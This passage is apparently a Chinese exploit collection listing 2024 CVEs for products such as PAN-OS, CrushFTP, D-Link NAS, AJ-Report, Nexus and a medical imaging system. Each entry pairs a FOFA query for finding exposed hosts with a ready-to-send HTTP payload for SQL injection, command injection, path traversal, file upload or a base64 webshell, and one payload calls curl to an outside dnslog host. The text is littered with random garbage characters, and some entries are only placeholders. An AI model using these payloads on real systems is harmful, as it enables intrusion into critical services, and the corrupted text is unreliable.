: R! q+ O/ O& O& [139. 福建科立讯通信指挥调度平台editemedia.php sql注入 g+ Q9 l8 P6 G6 P' T/ S
CVE-2024-2622
& r) v3 a6 m! ?; iFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"6 C9 x1 @$ O' E2 p6 ^4 C
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.16 v* V( X, @7 V+ Q" X' }0 a
Host: x.x.x.x6 E. g, B% q. j. r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.03 A, K4 z! `( h. l) z# p* P' n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) `0 t5 l0 n( Z% K3 b8 ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: _: [ a/ i- vAccept-Encoding: gzip, deflate, br- j+ v V! E! W5 s" }! M$ {
Connection: close4 V1 t' q6 z2 x+ O6 i' X
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk3 [! ?- K0 D3 R3 j' T% Y
Upgrade-Insecure-Requests: 1
/ B. @* U- ?& a2 t+ z! x$ P+ J/ A4 M! V4 v
. k& s* z, l; Z/ {140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入- I [1 @, ^1 t0 }! w
CVE-2024-2566: ^" {+ G/ ~* B/ \3 g0 X, a
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
" x, L! C- y0 S# P" G _0 v, }GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
( P) N* g9 B+ m8 V; u* ?4 [9 `Host: x.x.x.x
, G. _/ p) n4 u6 lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
# ^9 }& z3 g9 o0 v: Y; ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 v4 E9 r& m. ~: G& U8 vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 c" I W3 m. v! kAccept-Encoding: gzip, deflate, br
' f3 ^# M$ r* X) U4 I; u, MConnection: close0 R& x$ M" ` E- S4 t
Cookie: authcode=h8g90 O" M8 E! z6 I
Upgrade-Insecure-Requests: 14 X4 d. B" d7 U
. \+ G1 [# G {/ {( e
; }0 [1 T* d7 O. w3 m0 z
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
% f- m& Z5 T; x4 z L" a; P* ZFOFA:body="指挥调度管理平台"
3 ]0 l: `2 W* _, @1 M3 G: ]POST /app/ext/ajax_users.php HTTP/1.1
1 |- O8 K" d1 v: Q, `3 KHost: your-ip
9 _. Z9 ?3 k$ j! C9 v0 k3 c0 i6 ^User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info; J* ~9 s' v1 Q% L% U9 k1 Y; c
Content-Type: application/x-www-form-urlencoded) @( J, [5 W+ l9 {% T) F: \
8 L, X; u) n; A7 j) M J
7 w* k; E- m3 [2 U$ n2 W% v
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
0 @5 p. L* k1 U
0 u6 X4 C3 e3 j4 e/ p
1 ?: }, f0 `$ L2 n142. CMSV6车辆监控平台系统中存在弱密码/ f3 W& l& A1 [2 Y- v3 K
CVE-2024-29666
$ r: q* X; w- w1 ~+ `FOFA:body="/808gps/"7 g6 d2 V; C+ |4 N3 P+ q
admin/admin9 f5 E% `, l8 f$ x' ~' v
143. Netis WF2780 v2.1.40144 远程命令执行, C1 w! \; ]6 n G
CVE-2024-25850" ]8 y: ~* t9 K- Y
FOFA:title='AP setup' && header='netis'
8 l! ]7 S0 V6 R0 W7 b( Y+ C+ o4 _PAYLOAD, C! ^* \7 q% e6 R6 ?
3 {2 ]( j; |! @- X
144. D-Link nas_sharing.cgi 命令注入. E1 l1 \( d- Y0 |8 h5 m
FOFA:app="D_Link-DNS-ShareCenter"
5 B4 w2 J, j3 m" `" Q, {* Rsystem参数用于传要执行的命令
6 d3 l& w {/ }8 bGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
# P" _. l! a+ y& z: _Host: x.x.x.x& j& P3 C) z0 C# P# n
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
8 T7 u2 K! g8 b4 L+ K2 JConnection: close
7 y& t( m# V8 W* J2 s# HAccept: */*& z$ r% z' `* \
Accept-Language: en9 x9 B* U% l( g* J7 ]) O
Accept-Encoding: gzip2 a, f' ~% \2 [* [1 X
# W- _- D2 @+ b* v
( }2 r- \' a, ?4 t, c4 ?145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
" y6 b9 J9 l( B2 qCVE-2024-3400
5 {, R6 |4 h: t* k! B1 u6 |FOFA:icon_hash="-631559155"
1 S: |$ J4 z- \& e8 mGET /global-protect/login.esp HTTP/1.10 L! ]: \/ T" S p8 a; r( O
Host: 192.168.30.112:1005
! R- u9 c$ d, M! O9 iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84- v5 b7 C+ Q/ |$ M7 \& m
Connection: close# e+ t7 a2 h t5 z' ?, \
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
. z8 B+ Y3 y# t+ ]Accept-Encoding: gzip7 \/ M/ k4 B& R( r. `
/ Q7 Q: K$ _0 b% S- L% r/ K
; K3 q q, L0 h2 c146. MajorDoMo thumb.php 未授权远程代码执行& [: I4 p" y/ u4 S- J7 Y8 @ E; s
CNVD-2024-02175) y6 j* s5 w- U
FOFA:app="MajordomoSL"
7 H. f8 z) k. q9 K. `5 _GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
% {+ b* ^* |) d0 NHost: x.x.x.x6 s0 e' c4 {; b. h# x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84( T M J( P1 S3 P1 Q
Accept-Charset: utf-89 z2 r7 j/ e) C) [ i4 B/ R0 u
Accept-Encoding: gzip, deflate
1 Z, q- t. x" `" S- z7 _7 a. u: {, _5 \Connection: close" [9 C k5 \ i Y; G6 h: T h8 |/ G
8 o9 ?3 @2 G2 Z; N, ^4 q
+ i% o6 ^0 {3 _$ j
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历( f1 `6 p) M: B5 P1 Z
CVE-2024-32399
3 |$ F7 g6 K2 Y6 @FOFA:body="RaidenMAILD"
* w g& H+ p( u, e" HGET /webeditor/../../../windows/win.ini HTTP/1.1
. A; ]5 G* c3 H. v: K* w0 k2 ~Host: 127.0.0.1:812 Y h1 u8 |1 L" n
Cache-Control: max-age=0
; p; `5 }+ _9 [- {Connection: close
7 u$ q/ f$ `" W! v1 `! p) M }
* u3 m y3 t4 O% ~1 ~$ P4 |0 _' f
148. CrushFTP 认证绕过模板注入2 Y# W T9 S* q( f
CVE-2024-4040
, ]4 f6 u% r5 OFOFA:body="CrushFTP"
: V0 N5 |8 l0 e% `: u% X& JPAYLOAD. a. i J( ], d( c
% ?9 x7 v" e) Q p. S# S% f149. AJ-Report开源数据大屏存在远程命令执行. R8 c2 ~0 X5 j7 w: M4 W1 E& ?/ R
FOFA:title="AJ-Report"
8 M- ^- K a1 |- M
5 D; M& M/ s$ m5 l0 TPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1& ^0 z0 c; ^: I; G5 d8 A: N# V2 u
Host: x.x.x.x
6 N4 k; h+ d7 W7 GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.362 W$ w2 h( c' U' o" Y- j3 }$ O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
x% {4 i( n, N* C7 UAccept-Encoding: gzip, deflate, br
; g Y7 o# I( g/ s8 R0 lAccept-Language: zh-CN,zh;q=0.94 V, p. T5 L: M( q, n. A( Z1 g) [
Content-Type: application/json;charset=UTF-8+ h3 B/ e" f5 h) E1 F
Connection: close) y1 d8 O {- ]0 E+ x' E. @
: b0 c# H$ y% U4 c$ J, k5 v w
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
' x+ N, t& j7 ]- u# _. a. I8 x2 o9 f: B
150. AJ-Report 1.4.0 认证绕过与远程代码执行
* p) ?% n' U+ ^6 T8 ^4 aFOFA:title="AJ-Report"
) z0 l' U: w6 }7 o1 E3 f/ i# vPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
5 v/ Z( u6 D8 o# T. r- }Host: x.x.x.x7 U6 k) l9 q: l4 h" s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36- n C; M+ R8 y6 e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ J& H* D4 X. x2 ?2 HAccept-Encoding: gzip, deflate, br$ u% W1 j, j* d0 m6 ]: d3 e
Accept-Language: zh-CN,zh;q=0.9& S' w8 Y6 P# |# }2 d: W. n7 d
Content-Type: application/json;charset=UTF-8
/ l6 E. H3 ~0 EConnection: close( H6 i, @+ { H+ Y
Content-Length: 339% d- |7 P3 u w( G! F% Y
% i5 M0 ^8 H7 ~6 @) `{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}; G5 D G9 N: Q, E! e M' Q
3 Q; P1 I. g- ~$ N P
5 ? x; j) q, y151. AJ-Report 1.4.1 pageList sql注入
3 }0 D# T7 a7 g9 h v1 G$ wFOFA:title="AJ-Report"' g# w# S' a/ ~$ e& g
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
2 _# d! g: q, Z3 N9 ?Host: x.x.x.x$ P) {7 x% V0 v% u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 `$ z0 n9 V! W. [2 dConnection: close9 l. c9 S) W& \. i- H& L0 R
Accept-Encoding: gzip
2 a7 F6 m4 D( U& B2 R
; i' X/ l1 f8 [4 s' V) m A
; M) o& A" X* T152. Progress Kemp LoadMaster 远程命令执行
, u2 U3 a: S' V: _% GCVE-2024-1212: S6 F3 e' n" r) i
LoadMaster <= 7.2.59.2 (GA)* `1 R: a" [6 y! {, ]% w) ~# w4 n
LoadMaster<=7.2.54.8 (LTSF): I0 j: i& g* d3 W$ T5 T
LoadMaster <= 7.2.48.10 (LTS)" I* V9 U$ j1 d4 b3 f
FOFA:body="LoadMaster"
7 @7 y) E; n" M' d" gJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码) D9 ]9 Z- |1 i6 n# G
GET /access/set?param=enableapi&value=1 HTTP/1.1' y% n- s8 f! L4 U2 [9 x J
Host: x.x.x.x0 T6 u& {, K& F& D' t$ m( Z! _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
) \! z) b$ Q/ D( FConnection: close
! K% a% k* |+ J3 Y4 ?% eAccept: */*2 H/ M# e1 m2 x9 j
Accept-Language: en* |. G" ^9 L1 c: @* g8 ~
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=4 Z9 |$ u$ E/ N. j( @5 C
Accept-Encoding: gzip
' J `6 A4 ?7 y! W8 N! H
: W* Z. a7 K0 q
$ b/ E9 v9 E" \# j* K153. gradio任意文件读取
: ~, y4 v) ^0 G% NCVE-2024-1561FOFA:body="__gradio_mode__"
/ v3 |% \" l3 d& E0 B8 o* u第一步,请求/config文件获取componets的id; v i+ ^) k2 p, ^! R% A
http://x.x.x.x/config3 J: ~; Y, C+ w
; F8 |4 O0 }# D2 f# S/ o
, Y& U# ^- d6 J4 G0 m l2 j3 L第二步,将/etc/passwd的内容写入到一个临时文件
4 z/ U' y- A+ B; [4 G' f L7 bPOST /component_server HTTP/1.1
3 [( x- a% B% F) Q& `. ^Host: x.x.x.x
. c* }" x/ Z/ \1 `1 W! W9 IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
/ V8 l6 Q7 w6 t- {# Q! o* i: W' }Connection: close5 h9 k) \8 Q9 M |4 N5 B
Content-Length: 1159 y8 R/ x" |. Z7 C5 f# X
Content-Type: application/json4 N6 R3 _5 i# V2 H/ |
Accept-Encoding: gzip
4 a# E2 R7 a8 e) N( A: f# t' o! C2 K E9 `
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}: B' n& A; A$ {+ ~ U8 {( e: c
, p7 i! f2 R: W% e1 b
$ N) K, U2 E C9 o0 T) x0 ]
第三步访问' `1 A) O$ C I7 b! M3 A" f. q `
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd: m6 b6 L& e9 c# u g$ r* X
. I6 k% t1 f8 {7 Y7 |. f8 l$ @& T
8 Y- U- n* C- I% t: }154. 天维尔消防救援作战调度平台 SQL注入4 l( w( Q2 a" m0 E* @6 L. j- c
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
3 w1 e6 ^7 N# }POST /twms-service-mfs/mfsNotice/page HTTP/1.1
; m/ y3 N& j* g( tHost: x.x.x.x+ \; e6 E d1 c" _$ ?# j& B
Content-Length: 106
4 ], v# B5 Z( `% @Cache-Control: max-age=03 J# R* n+ F% H; u# B
Upgrade-Insecure-Requests: 1
- H) F2 u! _% oOrigin: http://x.x.x.x" W4 ^4 W7 q T# ~" r: E
Content-Type: application/json5 c% k; a; Z8 c3 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36& z1 u' s" K5 h7 H: X. G& U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 z8 M' m# r, ^( C) t3 m! _' }1 K
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page c- |. X& X' \- w$ T: z* T
Accept-Encoding: gzip, deflate* |7 {5 B5 q$ ~* @
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
6 `* C" @0 `( J& V- t7 M" |( vConnection: close
- O5 I: G: ]6 w7 D- m% a. W+ `# `0 H# ], S0 ]! |2 @/ p; Q5 U
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
/ ?1 a; j) c' }7 d+ R e8 r. } w O
- W& \9 B+ W% N i4 D155. 六零导航页 file.php 任意文件上传% D1 o P0 I6 X+ Q8 J' N
CVE-2024-349829 D3 o* j2 d) L1 U z4 x" k
FOFA:title=="上网导航 - LyLme Spage"
$ l6 Q. ?" |" j# ~POST /include/file.php HTTP/1.1
8 g, C1 |5 r; D3 L% pHost: x.x.x.x7 D3 p0 J7 Z, A( p- Z; ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.00 [/ v: l9 ?9 x9 y0 q8 Y" Z
Connection: close# h" {0 P. C( N* w! m& L4 v3 d
Content-Length: 232 m& t5 v3 n2 _% x* L
Accept: application/json, text/javascript, */*; q=0.015 D) e- R. a; R$ S7 s( `
Accept-Encoding: gzip, deflate, br
- N, }- S% j1 k& W. lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& P2 i, d/ \/ `+ C" u5 aContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f( z6 L8 Y g# b
X-Requested-With: XMLHttpRequest
; g3 @9 Q) U! K {' ^. ]: _/ {' y( \! u/ @
-----------------------------qttl7vemrsold314zg0f# i. K# Q }% \* e: k8 s# S
Content-Disposition: form-data; name="file"; filename="test.php"/ d' {) u+ V0 Z2 F8 z
Content-Type: image/png- |4 L/ y+ c; F+ b; t2 ~# U0 f) M
; ] r( {3 w6 g8 N; f; ~4 q5 |5 t
<?php phpinfo();unlink(__FILE__);?>
C% S) o. ?$ g9 z9 g-----------------------------qttl7vemrsold314zg0f--
- Z: q5 H, X7 [* |
5 Q7 K5 {1 @: i( |# q- s$ ]. u. j# r8 w- o
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php& M, T0 \# F. v6 q' L* w( m9 u
( z- C+ R' z* _; d) K156. TBK DVR-4104/DVR-4216 操作系统命令注入
+ @1 }0 _, f1 i- V$ S1 ACVE-2024-3721+ M" T ?" S# O' _& ~4 G$ a
FOFA:"Location: /login.rsp"% x. A3 {- i: X$ s- I
·TBK DVR-4104
, p2 r% D1 d0 W: H+ a·TBK DVR-42162 _$ D3 N* {2 H! e9 m+ E) m
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
# x3 ]5 d; x3 F" _# b2 v5 ^# P
; C, D4 I- o; t" c% [3 s6 i! h2 u. s" i- |5 l/ G( B. L
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
, ^+ I4 N! n" k) ]7 AHost: x.x.x.x
0 o8 E9 r- }. a+ {! g& kUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& s a% F! l7 m! UConnection: close
* q1 P" d. h( S% t0 W Q1 q' RContent-Length: 0
. b' R" ~0 s# S2 b, U L7 D6 oCookie: uid=15 _7 N% |4 Z* F% n/ T+ [/ P" g
Accept-Encoding: gzip
1 F2 H3 h# `8 _1 b8 y0 [/ P; b/ q# w/ N- r/ E
: Q5 d- k. x$ \9 x" ]. W
157. 美特CRM upload.jsp 任意文件上传' s5 U+ Q0 J; y
CNVD-2023-06971
$ O& Y6 l* ]' |1 R" cFOFA:body="/common/scripts/basic.js"4 t' x8 w9 j/ c; M6 d" U3 _ \8 r
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1* v# x, r; A z" _5 _ t# o0 v
Host: x.x.x.x& f. U: b4 O; x# T0 T; }! C2 J& {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36* A5 F( j) \/ f1 |7 q; p' K! }
Content-Length: 709$ d( z2 v1 h8 A0 w: @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& V% y9 G u& o- n! H) V( MAccept-Encoding: gzip, deflate
) J- ^4 b. g/ g8 z# s2 gAccept-Language: zh-CN,zh;q=0.9
$ n& g* h9 |5 L4 b5 VCache-Control: max-age=0
; _' @ w5 R% i7 r9 F) P1 SConnection: close: s6 A0 _/ V+ D: x2 _' c* h
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
1 |0 k2 A) U' ]+ l* E- R$ ^Upgrade-Insecure-Requests: 17 l; a2 `8 U2 h# t6 _/ |$ C
9 n: E6 P5 a3 E; p4 A
------WebKitFormBoundary1imovELzPsfzp5dN
1 P* D+ t, m+ g1 O! T9 F5 XContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
! j7 S+ B6 f6 E& N6 [Content-Type: application/octet-stream$ N( s. n) V$ e+ Y; e x
9 z: X% A7 t/ I" R8 G
nyhelxrutzwhrsvsrafb
* U7 j' ^/ ]6 O# J8 _5 m------WebKitFormBoundary1imovELzPsfzp5dN
6 o0 {( d6 v9 F2 L0 KContent-Disposition: form-data; name="key"2 R9 r. u' A3 `7 D g9 A
5 w: f' C" Y5 \( N. Inull9 E0 V o- \' G) K( f" l
------WebKitFormBoundary1imovELzPsfzp5dN
+ E9 d, I6 n+ a, i" k7 h1 a& CContent-Disposition: form-data; name="form"
2 h4 f1 i- B1 @- V2 h# x& `$ ? i
( U. O2 }7 V+ j0 Cnull8 X) N7 m+ L, G0 d+ ^7 B
------WebKitFormBoundary1imovELzPsfzp5dN2 e, k# ~: Z' G/ F# j0 D
Content-Disposition: form-data; name="field"
3 D) s1 T2 e. W4 t; K# k' m4 u, F, z* {( S+ I# M9 Y _
null5 ~4 u- K% I9 I$ S7 `) X5 L7 s
------WebKitFormBoundary1imovELzPsfzp5dN: D$ \) R: p7 O2 Y0 `, U
Content-Disposition: form-data; name="filetitile"( Z6 K$ d8 i% j% w
+ b1 Z5 Q- U8 @2 c5 Snull
9 G* G5 U8 _# B, Z8 [* k------WebKitFormBoundary1imovELzPsfzp5dN4 l! H6 n3 E) z8 X$ n! @3 c
Content-Disposition: form-data; name="filefolder"
7 {- y* _+ O7 I& I* B! P' ^1 X T+ h. M# i( e8 `2 i
null1 Q5 N2 u& ]6 F7 v+ ]5 W3 T6 `
------WebKitFormBoundary1imovELzPsfzp5dN--) |4 {" n% Q- Z+ Q) h! Y
6 g* x, e5 u$ K9 q# z/ N e
& b4 F) @# P3 T6 s
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp4 i5 z" w1 G" G8 [- o3 e4 ]; t
! Z) l4 n9 q. C8 S- {$ i+ F158. Mura-CMS-processAsyncObject存在SQL注入7 q. a$ G! h, ~3 e1 n, Z8 A
CVE-2024-32640
9 l# J: V; W ]% vFOFA:"Generator: Masa CMS"
# ^6 J! K" Q+ s* |1 V0 [+ l3 MPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1) g4 v9 Z$ {: G6 ` A' Z& i
Host: {{Hostname}}
# r, |' \ ?5 Y4 X9 ^* \0 u8 sContent-Type: application/x-www-form-urlencoded
! h, ]" m+ g6 Y) i2 Z7 z9 e5 r
: `% K$ L: Y- M; p9 M$ u2 W0 pobject=displayregion&contenthistid=x\'&previewid=12 ?8 [% \: W. z a1 {1 [( J
, l' d: j: c2 ?) O. x* ]; U- P# u4 S& G
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
/ R& H, f& \! j. A. EFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928"). M ]& @& Q% z
POST /webservices/WebJobUpload.asmx HTTP/1.1
: {- p7 M! `8 CHost: x.x.x.x
6 }$ P# Q1 r" r) B3 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
% l; o) n3 m$ ~+ mContent-Length: 1080
6 a9 k4 h. j- w) U, v O* {" EAccept-Encoding: gzip, deflate0 x. @ C3 G$ \# q3 v! e0 a- s
Connection: close6 L0 M3 _8 I) x0 X7 V
Content-Type: text/xml; charset=utf-8
* _, H4 b/ O- l6 [- f4 H8 USoapaction: "http://rainier/jobUpload"8 L; i( J* Y" w: P; {5 w$ d0 r" z% A
( y9 s+ ]+ j$ F+ C6 M: [<?xml version="1.0" encoding="utf-8"?>
) ?" z p4 M( u* M<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
. M* J8 S; y( m6 P6 n' i+ x<soap:Body>0 r/ U, I( [, x6 S |1 z
<jobUpload xmlns="http://rainier">& I. o, h7 Y% _0 _
<vcode>1</vcode>. y' t! |* x) O
<subFolder></subFolder>
) [% `5 \( {1 R- y/ y<fileName>abcrce.asmx</fileName>
$ A6 M& E2 c, d4 X- g" g/ a<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
% a/ K- E7 p& _! K8 C6 R4 u</jobUpload># c9 y6 Y" U& m0 }
</soap:Body>
/ s9 b7 y9 g4 t% a: \' p$ C9 U</soap:Envelope>
3 Q. @' ^2 y2 h! h3 u4 U/ y t( h+ Y7 u+ e1 I8 K& ?6 `
+ @7 Z$ r9 j2 `9 g1 d) ~$ u/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")" H. e. T4 \5 O# x7 u
% q& L: z9 j/ R: q# H* a
1 N6 }+ X$ B4 k$ M, q6 b160. Sonatype Nexus Repository 3目录遍历与文件读取
2 I- M' [+ Z; D( f4 i! `CVE-2024-4956
4 `# \$ Z6 J" wFOFA:title="Nexus Repository Manager"+ S6 h3 F+ ~- s! n( M1 U' @- T4 [
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
# w* r3 P. I: WHost: x.x.x.x
/ v! H8 ?, h- M8 H/ m7 |User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0, ?" u! ~" b) ?7 @+ o) |
Connection: close
0 [* M# k! f: p6 P6 y9 |Accept: */*
: k) W ?" f& m1 q3 oAccept-Language: en0 n! N1 g: t0 `& L4 u- ]
Accept-Encoding: gzip9 r% ~/ n N6 z7 I& S: _
% B/ L+ q( Y4 M- h# A' l! n
1 y) G. N+ f& l% t! i161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
2 k+ ]- ]) w. }0 N( V" K+ tFOFA:body="/KT_Css/qd_defaul.css"
8 r' T1 P* |- s* x! E* {第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密$ J# S5 q! X& B8 G: ]$ R
POST /Webservice.asmx HTTP/1.1& Y' n6 H8 r6 D8 ]. I
Host: x.x.x.x" D6 |5 b# M8 O% h. ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
4 z1 `$ D) g3 S% IConnection: close
/ P8 |: y) C8 EContent-Length: 445
1 T6 C1 ?2 X! \, S' r" C! lContent-Type: text/xml
4 |5 Z' D# @. L. N& T8 U, }Accept-Encoding: gzip
9 {# W1 Q2 T* ]4 a L3 u1 J5 P- E0 R- H( a% }$ c
<?xml version="1.0" encoding="utf-8"?>
7 s5 B( i0 v8 I9 x<soap:Envelope xmlns:xsi="
3 |" M# C; L, e' o" R+ Bhttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"0 y4 n+ N/ a6 f3 K
